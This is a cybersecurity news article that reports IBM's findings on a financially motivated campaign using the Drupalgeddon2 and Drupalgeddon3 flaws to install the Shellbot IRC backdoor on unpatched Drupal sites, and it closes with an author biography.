Hackers targeting Drupal vulnerabilities to install the Shellbot Backdoor

A group of hackers is targeting Drupal vulnerabilities, including Drupalgeddon2, patched earlier this year to install a backdoor on compromised servers.

Security experts from IBM are targeting Drupal vulnerabilities, including the CVE-2018-7600 and CVE-2018-7602 flaws, aka Drupalgeddon2 and Drupalgeddon3, to install a backdoor on the infected systems and tack full control of the hosted platforms.

According to the IBM experts, this last wave of attacks is conducted by hackers financially motivated and attempt to exploit the lack of patch management in many Drupal websites.

“In a recent investigation, our MSS intelligence analysts discovered that malicious actors are using recent Drupal vulnerabilities to target various websites and possibly the underlying infrastructure that hosts them, leveraging Shellbot to open backdoors.” states the post published by IBM.

“This appears to be a financially motivated effort to mass-compromise websites.”

The expert observed a large number of HTTP POST requests being sent by the same IP address as part of a widespread cyber-attack. The requests were used by the attackers to download a Perl script to launch the Shellbot backdoor that leverages an Internet Relay Chat (IRC) channel as C&C.

The bot included multiple tools to carry out distributed denial-of-service (DDoS) attacks and scan for SQL injection weaknesses and other vulnerabilities, including privilege escalation issues.

The bot was designed to automate scanning a large number of websites and fully compromise the vulnerable ones.

Experts pointed out that the Shellbot code first appeared in 2005 and is being used by several threat groups, it was also used in the massive crypto-mining campaign that was exploiting the CVE-2017-5638 Apache Struts vulnerability (CVE-2017-5638) in March 2017.

“It costs a lot of time and money to find or buy a zero-day flaw — two resources cybercriminals are typically not willing to invest. It is much more lucrative to use existing vulnerabilities such as Drupalgeddon and attack code in an automated way, especially when users delay patching and updating their applications,” IBM concludes.

[adrotate banner=”9″]

[adrotate banner=”12″]

Pierluigi Paganini

(Security Affairs – Drupal, hacking)

[adrotate banner=”5″]

[adrotate banner=”13″]

Pierluigi Paganini

Pierluigi Paganini is member of the ENISA (European Union Agency for Network and Information Security) Threat Landscape Stakeholder Group and Cyber G7 Group, he is also a Security Evangelist, Security Analyst and Freelance Writer. Editor-in-Chief at "Cyber Defense Magazine", Pierluigi is a cyber security expert with over 20 years experience in the field, he is Certified Ethical Hacker at EC Council in London. The passion for writing and a strong belief that security is founded on sharing and awareness led Pierluigi to find the security blog "Security Affairs" recently named a Top National Security Resource for US. Pierluigi is a member of the "The Hacker News" team and he is a writer for some major publications in the field such as Cyber War Zone, ICTTF, Infosec Island, Infosec Institute, The Hacker News Magazine and for many other Security magazines. Author of the Books "The Deep Dark Web" and “Digital Virtual Currency and Bitcoin”.